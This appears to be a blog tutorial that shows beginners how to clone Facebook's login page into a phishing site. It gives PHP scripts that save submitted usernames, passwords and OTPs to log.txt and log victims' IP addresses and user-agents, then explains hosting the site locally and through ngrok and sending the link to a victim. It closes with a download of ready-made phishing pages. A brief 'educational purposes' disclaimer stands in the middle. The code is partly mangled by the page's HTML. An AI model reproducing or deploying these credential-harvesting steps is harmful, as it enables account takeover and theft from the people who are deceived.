Table of Contents
phishing page – In this article, I’m going to teach you how to create a phishing page for beginners. Now you think so many phishing tools are available on the web, so why do we need to create a phishing site. All tools are creator convenience so you can only use that page. but if you learn from this tutorial you can make any website a phishing page.
How to create a phishing page?
- Any Device
- Chrome Browser
- Get username and password
- Get User-Agent information
- Get OTP
Download HTML Index page of Target
First, we need to choose the target website. After that just go to that website. I choose the Facebook website.
Once you entered your target website, click right said mouse button to select the “view page source” option
Once you click the “view page source option“. it will open one new window and show all that website source
Now press Ctrl+A to copy the Facebook page source. After that past it to your notepad
After getting the page source in your notepad. press Ctrl+F to open the find bar on your notepad. then type Action= in the find bar
Now Remove the /login/privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjEwNzY3NTUzLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D command and type login.php
After that save this facebook source file with the name login.html
Creating PHP file For Password Harvesting
Now we have to complete creating a Facebook phishing site but if we host this login.html file into our system it will not capture any data from the user so now we need to create a harvesting PHP script Therefore you follow the below steps.
First, you need to copy paste the below PHP code in your notepad.
<!--phpheader (‘Location: facebook.com’);$handle = fopen(“log.txt”, “a”);foreach($_POST as $variable =--> $value) {fwrite($handle, $variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);}fwrite($handle, “rnnnn”);fclose($handle);exit;?> After that, you save this PHP file with the name login.php
If we need to create other website phishing pages means one small correction is there in the login.php file header section. the current login.php file header section is facebook.com. if you create an Instagram phishing page means you change that header value facebook.com to instagram.com
<!--phpheader (‘Location: instagram.com’);$handle = fopen(“log.txt”, “a”);foreach($_POST as $variable =--> $value) {fwrite($handle, $variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);}fwrite($handle, “rnnnn”);fclose($handle);exit;?> Create a PHP file to get user-agent information
Now we completed creating a phishing page and creating a Password Harvesting script. After that, we need to create a user-agent information script so you follow the below steps.
Now we need to create another PHP file to capture victim “user-agent” information so you copy the below PHP code and past it to your notepad.
<!--phpif (!empty($_SERVER[‘HTTP_CLIENT_IP’])) { $ipaddress = $_SERVER[‘HTTP_CLIENT_IP’].”rn”; }elseif (!empty($_SERVER[‘HTTP_X_FORWARDED_FOR’])) { $ipaddress = $_SERVER[‘HTTP_X_FORWARDED_FOR’].”rn”; }else { $ipaddress = $_SERVER[‘REMOTE_ADDR’].”rn”; }$useragent = ” User-Agent: “;$browser = $_SERVER[‘HTTP_USER_AGENT’];$file = ‘ip.txt’;$victim = “IP: “;$fp = fopen($file, ‘a’);fwrite($fp, $victim);fwrite($fp, $ipaddress);fwrite($fp, $useragent);fwrite($fp, $browser);fclose($fp);</xmp--> </code></pre><p>After that save this PHP file with the name <strong>ip.php</strong></p><figure> <img alt="user agent information geathering script" decoding="async" height="208" loading="lazy" sizes="(max-width: 613px) 100vw, 613px" src="https://www.errorsfind.com/wp-content/uploads/2021/07/ip_php_file_creation.png" srcset="https://www.errorsfind.com/wp-content/uploads/2021/07/ip_php_file_creation.png 613w, https://www.errorsfind.com/wp-content/uploads/2021/07/ip_php_file_creation-300x102.png 300w" width="613"><figcaption>Save User agent information script</figcaption></figure><h3>Connect all files into one file</h3><p>Now we have three files ip.php, login.html, and login.php. therefore connect all files into one file. so only we can host this file.</p><p>Copy the below PHP command into your notepad</p><pre data-line=""> <code readonly="true"> <xmp><!--phpinclude ‘ip.php’;header(‘Location: login.html’);exit?--> Now save these files with the name index.php
This is an Alert
This is only for educational purposes. If you use this for other purposes except for education we will not be responsible in such cases
How to Host a phishing page
so many ways are there to host our phishing page but now I’m teaching you two simple methods.
- Local server hosting
- 000webhost hosting
Local server hosting
First, you open the terminal inside the phishing page’s and type this below command.
php -S localhost:4444 
Now you will get a shareable link but this link only works on the same wifi network. if you need to share out of the network means to start the ngrok. so you minimize the current terminal and open a new one to start ngrok
Now share the ngrok link to your victim
Victim view
Once your victim clicks your link means that link will be shown in the below image.
If your victim types any data on your page.
That’s all data captured and show on your terminal.
Now you can create any website as a phishing site with this method. if you need more techniques tell me the command section.
All website phishing page
Wait for 120 seconds to download all phishing pages
You have to wait 120 seconds.
Download All Phishing Page
PASSWORD: www.errorsfind.com
إرسال تعليق